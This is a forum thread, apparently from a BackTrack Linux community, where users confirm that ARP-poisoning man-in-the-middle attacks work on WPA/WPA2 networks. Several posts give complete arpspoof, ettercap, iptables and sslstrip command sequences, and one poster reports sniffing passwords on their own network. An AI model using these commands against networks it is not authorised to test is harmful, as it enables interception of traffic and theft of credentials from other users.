Results 1 to 7 of 7

Thread: Is Arp-Poisoning MITM attack possible on WPA network?

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Location
    Somewhere...
    Posts
    12

    Default Is Arp-Poisoning MITM attack possible on WPA network?

    Hi guys,
    I've been piddling around with arp-poisoning using Ettercap-ng and Arpspoof along with Sslstrip and various Dsniff programs like urlsnarf, webspy, etc. I can succesfully perform a mitm on my open network and on my network with WEP encryption enabled, but I would like to be able to do the same on it with WPA encryption enabled. (Obviously I know the passkey cause its my network.)
    I was previously under the impression that it was difficult or impossible to perform an Arp Poisoning on a WPA encrypted network due to the fact that merely knowing the passkey is not sufficient to decrypt the packets because of the WPA handshake. Then I stumbled upon this thread "http://www.backtrack-linux.org/forums/old-newbie-area/24774-ettercap-wpa.html" which claimed that performing a mitm attack on a WPA network is done exactly the same as on an unencrypted network (no handshake or passkey stuff required as long as you're connected to the AP).
    Incidently, I have tried performing the attack just like on and unencrypted network (except I tried bothe Arpspoof and Ettercap-ng) but I end up DOSing both myself and my victim laptop.

    So, my questions are:

    1. Is the answer to this thread correct in saying that performing a MITM attack on a WPA is done the same as on an open network?

    2. If question 1. is "yes", then what am I doing wrong? (I will post my commands if that is the case)

    Thanks in advance!

  2. #2
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Well you're connected to the network right ? So yes..

    Posting commands used is always good to allow people to see what you have tried.

  3. #3
    Just burned his ISO
    Join Date
    May 2010
    Location
    Somewhere...
    Posts
    12

    Default Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Ok, thanks. I appreciate the help. I'm fairly certain its not a driver issue cause as I said before aircrack-ng works fine. I am using Backtrack 4 running on a Dell Mini 9 with an Intel 5100 card.

    Here are my commands. obviously they are run as root.

    Using Arpspoof:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    sslstrip -k -f -l 8080
    
    arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1
    Using Ettercap-NG:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    sslstrip -k -f -l 8080
    
    ettercap -T -i wlan0 -Tq -M ARP // //
    Also, for etter.conf I have cahnged ec_uid to 0, and ec_gid to 0. I did not uncomment the iptables line since I was using Sslstrip.

    Thanks for the help! I really appreciate it.

  4. #4
    Just burned his ISO
    Join Date
    May 2010
    Location
    Somewhere...
    Posts
    12

    Default Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Ok, I figured it out. Thanks TAPE for clarifying that its possible. For all those who may read this post in the future I would like to clarify:
    Contrary to what some other sites (I can remember specifically but I've read it somewhere) say, it is entirely possible to perform a MITM attack using Arpspoof (and probably Ettercap to but I haven't got it to work yet) on a WPA or WPA2 encrypted network. I sucessfully used Arpspoof and Sslstrip to sniff passwords on my WPA2 network. I'm sure many many people have done this before but I had spent a long time trying to find out if it was even possible, which it is.

    Just in case anyone is wondering what commands I used:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    cd /home/christopher/.sslstrip-0.7 #of course you will have to change this to your location
    
    python sslstrip.py -k -f -l 8080

  5. #5
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Perhaps best to first try and single out a specific host with ettercap
    Code:
    ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/

  6. #6
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Quote Originally Posted by TAPE View Post
    Perhaps best to first try and single out a specific host with ettercap
    Code:
    ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
    Also, rather than using the tools, learn how this sort of thing works - it is possible to hand generate our ARP packets and send them off. Less network traffic lets you learn what's going on and also reason out why things would be hurting a bit here.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  7. #7
    Just burned his ISO
    Join Date
    May 2010
    Location
    Somewhere...
    Posts
    12

    Default Re: Is Arp-Poisoning MITM attack possible on WPA network?

    Thanks guys! Actually, I've got it working with Ettercap in the meantime using the same commands as on an unencrypted network. Sorry I'm so slow to post. Thanks for the help TAPE, I actually had set specific targets I just typed it wrong in my post, but thanks for your time.
    Also, Gitsnik, thanks for the tip, I'll look into making my own Arp packets. That sounds like a useful thing to know how to do. I really appreciate you guys.
    I will mark this thread as solved.
    Thanks!

    edit: Actually, I can't figure out how to mark this thread as solved. If this is important please let me know how, otherwise I will assume that only the Admins can do that. thanks guys
    Last edited by BobaFett; 06-01-2010 at 11:24 PM.

Similar Threads

  1. MiTM Attack? How to detect
    By t-alla in forum OLD Newbie Area
    Replies: 9
    Last Post: 01-09-2010, 05:47 PM
  2. MITM attack question
    By taffy-nay in forum OLD Newbie Area
    Replies: 1
    Last Post: 10-26-2009, 02:40 PM
  3. SSL Rebinding & EV SSL MITM attack
    By htons139 in forum OLD BackTrack 4 Package and feature Requests
    Replies: 1
    Last Post: 08-21-2009, 08:38 PM
  4. MITM attack tools !
    By ioannou.alexandros in forum OLD BT3final Support
    Replies: 12
    Last Post: 03-16-2009, 04:32 AM
  5. Dsniff listing on eth0 w/o arp poisoning nor MITM
    By imported_bulgin in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-17-2008, 12:33 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •